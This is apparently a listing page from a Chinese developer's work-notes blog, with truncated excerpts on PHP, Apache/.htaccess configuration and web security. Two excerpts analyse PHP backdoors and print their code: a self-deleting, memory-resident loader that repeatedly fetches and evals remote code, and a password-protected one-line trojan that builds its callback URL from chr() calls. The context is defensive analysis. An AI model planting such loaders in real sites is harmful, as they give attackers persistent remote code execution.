袁来如此的工作笔记
竹杖芒鞋轻胜马,谁怕? 一蓑烟雨任平生。

Linux/PHP:

php static 声明的变量在函数执行完毕不会被删除

498浏览量
<?php    function myTest()  {      static $x=0;      echo $x;      $x++;  }    myTest();  myTest();  myTes

php getCateTree 递归树 不重复输出

538浏览量
php中方法返回值是一个静态数组,重复调用两次这个方法,导致上一次的结果在下一次的结果中显示这是因为这个静态变量没清掉而已, 直接在调用完方法后, 再调用下将list 释放掉, 就像这样:class Demo {    static $list = array();    public function getCateTree($data,&nbs

四款webshell扫描工具的对比评测

619浏览量
“世界上没有绝对安全的系统”,不论你对自己敲出的代码或者网站的安全性有多么拍胸脯的把握,你都不得不认同这至理名言。任何程序都有可能出现漏洞,任何网站都有被入侵的可能。近一段时间以来,各大漏洞一如既往地层出不穷。例如2018新年的第二天Intel就爆出了巨大的硬件缺陷,这迫使全球成千上万的主机商不得不连夜以损耗性能为代价做出产品的升级调整,数百亿的终端至今也仍处于危险之中。几乎每一个0day漏洞的报出,这样的场景都不得不重演。另一方面,我们在要求开发者不断提高产品安全系数的同时,不也应擦亮双眼洞察

一个后台内存里的PHP后门木马

841浏览量
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep(5); }; ?&g

窥探一句话木马后门的背后

528浏览量
分析的木马后门: <?php $password='vae';//登录密码(支持菜刀) //----------功能程序------------------// $c="chr"; session_start(); if(empty($_SESSION['PhpCode'])){ $url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47); $url.=$c(47).$c(105)

如何在Apache和Nginx禁止上传目录里PHP的执行权限

583浏览量
Apache下禁止指定目录运行PHP脚本在虚拟主机配置文件中增加php_flag engine off指令即可,配置如下:12345Options FollowSymLinksAllowOverride NoneOrder allow,denyAllow from all php_flag engine off另外一种方法,是设置在htaccess里面的,这个方法比较灵活一点,针对那些没有apapche安全操作权限的网站管理员:Apache环境规则内容如下:Apache执行php脚本限制 把这些

php实际开发中可以用到的安全过滤函数

548浏览量
1、stripslashes() 函数     stripslashes()主要功能是删除反斜杠<?phpecho stripslashes("Who\'s Bill Gates?");?>输出结果:Who's Bill Gates?2、htmlentities() 函数htmlentities() 把字符转换为 HTML 实体<?php$str&nbs

Apache RewriteCond RewriteRule 跳转故障解决

502浏览量
需求: 文件存在直接访问文件,文件不存在跳转到index.html。URL 以 /abc 开头的不跳转。错误规则    RewriteCond %{REQUEST_FILENAME} !-f         RewriteCond %{REQUEST_URI} !^/abc      

.htaccess:正则表达式、重定向代码

476浏览量
# 位于行首时表示注释。[F] Forbidden(禁止): 命令服务器返回 403 Forbidden错误给用户浏览器[L] Last rule(最后一条规则): 告诉服务器在本条规则执行完后停止重写URL[N] Next(下一条规则): 告诉服务器继续重写,指导所有重写指令都执行过[G] Gone(丢失): 命令服务器返回410 GONE(no longer exists)错误消息[P] Proxy(代理): 告诉服务器通过mod_proxy模块处理用户请求[C] Chain(捆绑): 告诉

ueditor编辑器上传图片添加水印 远程抓取图片添加水印

532浏览量
看php添加水印的函数,收集ueditor编辑器添加水印的代码,然后整合在一起,相关的操作如下:1.打开ueditor目录下的php目录下的config.json 文件1.1在上传配置项添加下面代码:"iswatermark": "true",  /* 前后端通信相关的配置,注释只允许使用多行方式 */ {     /* 上传图片配置项 */ &nbs